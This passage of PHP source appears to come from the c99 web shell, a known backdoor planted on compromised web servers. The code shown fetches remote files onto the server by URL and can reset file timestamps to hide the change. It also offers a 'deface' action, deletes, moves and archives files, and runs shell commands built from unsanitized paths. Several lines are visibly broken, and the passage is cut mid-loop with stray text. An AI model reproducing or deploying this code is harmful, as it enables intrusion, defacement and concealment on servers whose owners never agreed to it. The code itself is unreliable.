    while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
    }
    if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "Incorect url!
    ";}
    else
    {
    $st = getmicrotime();
    $content = @file_get_contents($uploadurl);
    $dt = round(getmicrotime()-$st,4);
    if (!$content) {$uploadmess .= "Can't download file!
    ";}
    else
    {
    if ($filestealth) {$stat = stat($uploadpath.$destin);}
    $fp = fopen($uploadpath.$destin,"w");
    if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!
    ";}
    else
    {
    fwrite($fp,$content,strlen($content));
    fclose($fp);
    if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
    }
    }
    }
    }
    }
    if ($miniform)
    {
    echo "".$uploadmess."";
    $act = "ls";
    }
    else
    {
    echo "File upload:
    ".$uploadmess."

    Select file on your local computer:
                   or

    Input URL:


    Save this file dir:


    File-name (auto-fill):


     convert file name to lovercase



    ";
    }
    }
    if ($act == "delete")
    {
    $delerr = "";
    foreach ($actbox as $v)
    {
    $result = false;
    if (empty($v)) {}
    $result = fs_rmobj($v);
    if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."
    ";}
    if (!empty($delerr)) {echo "Deleting with errors:
    ".$delerr;}
    }
    }
    if ($act == "deface")
    {
    $deferr = "";
    foreach ($actbox as $v)
    {
    $result = false;
    if (empty($v)) {}
    $result = fopen();
    if (!$result) {$deferr .= "Can't delete ".htmlspecialchars($v)."
    ";}
    if (!empty($delerr)) {echo "Deleting with errors:
    ".$deferr;}
    }
    }
    if (!$usefsbuff)
    {
    if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "
    Sorry, buffer is disabled. For enable, set directive \"USEFSBUFF\" as TRUE.
    ";}
    }
    else
    {
    if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls";}
    if ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";}
    if ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} $ls_arr = array_merge($sess_data["copy"],$sess_data["cut"]); c99_sess_put($sess_data); $act = "ls";}

    if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);}
    elseif ($actpastebuff)
    {
    $psterr = "";
    foreach($sess_data["copy"] as $k=>$v)
    {
    $to = $d.basename($v);
    if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!
    ";}
    if ($copy_unset) {unset($sess_data["copy"][$k]);}
    }
    foreach($sess_data["cut"] as $k=>$v)
    {
    $to = $d.basename($v);
    if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!
    ";}
    unset($sess_data["cut"][$k]);
    }
    c99_sess_put($sess_data);
    if (!empty($psterr)) {echo "Pasting with errors:
    ".$psterr;}
    }
    elseif ($actarcbuff)
    {
    $arcerr = "";
    if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
    else {$ext = ".tar.gz";}

    if ($ext == ".tar.gz")
    {
    $cmdline = "tar cfzv";
    }
    $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
    foreach($objects as $v)
    {
    $v = str_replace("\\","/",$v);
    if (is_dir($v))
    {
    if (substr($v,strlen($v)-1,strlen($v)) != "/") {$v .= "/";}
    $v .= "*";
    }
    $cmdline .= " ".$v;
    }
    $ret = `$cmdline`;
    if (empty($ret)) {$arcerr .= "Can't call archivator!
    ";}
    $ret = str_replace("\r\n","\n");
    $ret = explode("\n",$ret);
    if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
    foreach($sess_data["cut"] as $k=>$v)
    {
    if (in_array($v,$ret)) {fs_rmobj($v);}
    unset($sess_data["cut"][$k]);
    }
    c99_sess_put($sess_data);
    if (!empty($arcerr)) {echo "Archivation errors:
    ".$arcerr;}
    $act = "ls";
    }
    elseif ($actpastebuff)
    {
    $psterr = "";
    foreach($sess_data["copy"] as $k=>$v)
    {
    $to = $d.basename($v);
    if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!
    ";}
    if ($copy_unset) {unset($sess_data["copy"][$k]);}
    }
    foreach($sess_data["cut"] as $k=>$v)
    {
    $to = $d.basename($v);
    if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!
    ";}
    unset($sess_data["cut"][$k]);
    }
    c99_sess_put($sess_data);
    if (!empty($psterr)) {echo "Pasting with errors:
    ".$psterr;}
    }
    }
    if ($act == "ls")
    {
    if (count($ls_arr) > 0) {$list = $ls_arr;}
    else
    {
    $list = array();
    if ($h = @opendir($d))
    {
    while ($o = readdir($h)) {$list[] = $d.$o;}
    closedir($h);
    }
    }
    if (count($list) == 0) {echo "
    Can't open directory (".htmlspecialchars($d).")!
    ";}
    else
    {
    //Building array
    $tab = array();
    $amount = count($ld)+count($lf);
    $vd = "f"; //Viewing mode
    if ($vd == "f")
    {
    $row = array();
    $row[] = "Name";
    $row[] = "Size";
    $row[] = "Modify";
    if (!$win)
    {$row[] = "Owner/Group";}
    $row[] = "Perms";
    $row[] = "Action";

    $k = $sort[0];
    if ((!is_numeric($k)) or ($k > count($row)-2)) {$k = 0;}
    if ($sort[1] == "a")
    {
    $y = "";
    }
    else
    {
    $y = "";
    }

    $row[$k] .= $y;
    for($i=0;$i {
    if ($i != $k) {$row[$i] = "

    1 | 2 | 3